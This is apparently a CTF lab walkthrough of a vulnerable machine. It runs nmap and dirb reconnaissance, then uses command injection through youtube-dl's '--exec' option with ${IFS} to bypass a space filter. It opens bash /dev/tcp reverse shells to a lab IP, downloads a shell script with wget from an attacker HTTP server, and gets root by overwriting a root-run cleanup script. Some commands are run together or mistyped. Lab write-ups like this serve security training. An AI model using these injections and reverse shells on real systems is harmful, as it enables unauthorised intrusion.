Reconnaissance
- Scan network
nmap -sn <ip range>
2. Scan for open ports
nmap -Pn <ip>
3. Scan for open ports with high port number
nmap -Pn -p- <ip>
4. Scan for service
nmap -sV <ip>
5. Scan for vulnerability
nmap --script vuln <ip>
6. Fuzzing directory
dirb http://<ip>
7. Try login to ssh
ssh <ip>
8. Access site
http://<ip>
http://<ip>/admin
http://<ip>/tmp/
Exploitation
- Seems like it’s youtube downloader
2. Let’s try some video
Paste Video ID
Error!!!
3. Let’s try again with other video
Still error!!!
4. Intercept with Burp Suite
Send to Repeater
Send the request, there’s an error in result
5. Let’s google the result
I came across to this link: https://github.com/ytdl-org/youtube-dl/issues/21057
Access project page, read the manual
6. Back to repeater, try some command
--exec`pwd`
Read passwd file
--exec`cat /etc/passwd`
Error!!!
Replace space with “${IFS}”
--exec`cat${IFS}/etc/passwd`
7. Reverse shell
Create listener
nc -lvp 1234
Try reverse shell command
Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
--exec`bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.0.2.8/1234${IFS}0>&1`
Failed!!!
Let’s try another way, I will upload reverse shell file to victim’s machine instead
Create python reverse shell and save it as “shell.sh”
Create HTTP Server
python -m SimpleHTTPServer <port no.>
Back to repeater
--exec`cd${IFS}/var/www/html/images/;wget{IFS}http://<attacker ip>:<attacker port>/shell.sh`
--exec`cd${IFS}/var/www/html/images/;bash${IFS}shell.sh`Privilege Escalation
- First flag
cd admincat flag.txt
2. Get root access
cd /tmplscat clean.shecho 'bash -i >& /dev/tcp/10.0.2.8/1234 0>&1' > clean.sh
Back to attacker’s machine, we already have listener on port 1234.
Wait for a moment
Now, I have root shell
cd /rootls cat root.txt
